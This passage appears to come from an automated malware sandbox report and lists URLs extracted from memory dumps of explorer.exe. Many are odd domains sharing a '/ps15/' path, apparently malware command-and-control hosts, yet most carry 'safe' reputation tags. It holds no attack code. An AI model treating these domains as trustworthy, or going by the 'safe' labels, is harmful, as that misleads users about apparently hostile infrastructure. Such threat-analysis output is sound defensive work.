                                                      http://www.trezorsuite.net/ps15/www.gomenasorry.comexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.passrmale.com/ps15/explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://word.office.comexplorer.exe, 0000000C.00000000.1315888639.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3744784252.000000000C091000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.seraphmovement.com/ps15/explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.resmierabaru20.shopexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-darkexplorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.thepeacedealers.com/ps15/www.casinomaxnodepositbonus.icuexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.casinomaxnodepositbonus.icu/ps15/www.33pgaaa.comexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.seraphmovement.com/ps15/www.fashiontrendshub.xyzexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://outlook.comexplorer.exe, 0000000C.00000000.1315888639.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3744784252.000000000C091000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.passrmale.comexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.33pgaaa.com/ps15/explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.casinomaxnodepositbonus.icuexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://android.notify.windows.com/iOSexplorer.exe, 0000000C.00000003.2271650261.000000000913F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1312007503.000000000913F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexplorer.exe, 0000000C.00000000.1312007503.0000000008F4D000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.stdaev.com/ps15/www.seraphmovement.comexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.mayson-wedding.com/ps15/explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://api.msn.com/v1/news/Feed/Windows?explorer.exe, 0000000C.00000002.3741055942.0000000008F09000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.1312007503.0000000008F09000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.gomenasorry.comexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actuaexplorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        		unknown
                                                        http://www.ellipsive.comexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaTexplorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.pollensense.com/explorer.exe, 0000000C.00000000.1308477475.00000000071B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.33pgaaa.comReferer:explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.briefout.cloudReferer:explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.mayson-wedding.comexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.kaidifeiniroo.net/ps15/www.plasoi.xyzexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.fashiontrendshub.xyzexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/viexplorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.briefout.cloud/ps15/www.kaidifeiniroo.netexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-bexplorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://schemas.microexplorer.exe, 0000000C.00000000.1311534834.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000000.1311557126.0000000008820000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000C.00000002.3738832346.0000000007C70000.00000002.00000001.00040000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINtexplorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.seraphmovement.comexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-explorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.kaidifeiniroo.net/ps15/explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.33pgaaa.comexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.plasoi.xyzReferer:explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-itexplorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.gomenasorry.comReferer:explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.briefout.cloudexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.casinomaxnodepositbonus.icuReferer:explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.plasoi.xyzexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.passrmale.comReferer:explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.gmgex1.comReferer:explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsmexplorer.exe, 0000000C.00000000.1308477475.00000000071FC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.thepeacedealers.comReferer:explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.passrmale.com/ps15/www.trezorsuite.netexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svgexplorer.exe, 0000000C.00000002.3737130665.00000000071FC000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://powerpoint.office.comexplorer.exe, 0000000C.00000000.1315888639.000000000C091000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3744784252.000000000C091000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.foreca.comexplorer.exe, 0000000C.00000000.1308477475.00000000071B2000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.briefout.cloud/ps15/explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.casinomaxnodepositbonus.icu/ps15/explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.resmierabaru20.shop/ps15/www.thepeacedealers.comexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.trezorsuite.netReferer:explorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.33pgaaa.com/ps15/www.ellipsive.comexplorer.exe, 0000000C.00000003.3078569930.000000000C518000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.3077369468.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.3748945127.000000000C515000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271433902.000000000C565000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000003.2271102506.000000000C50B000.00000004.00000001.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
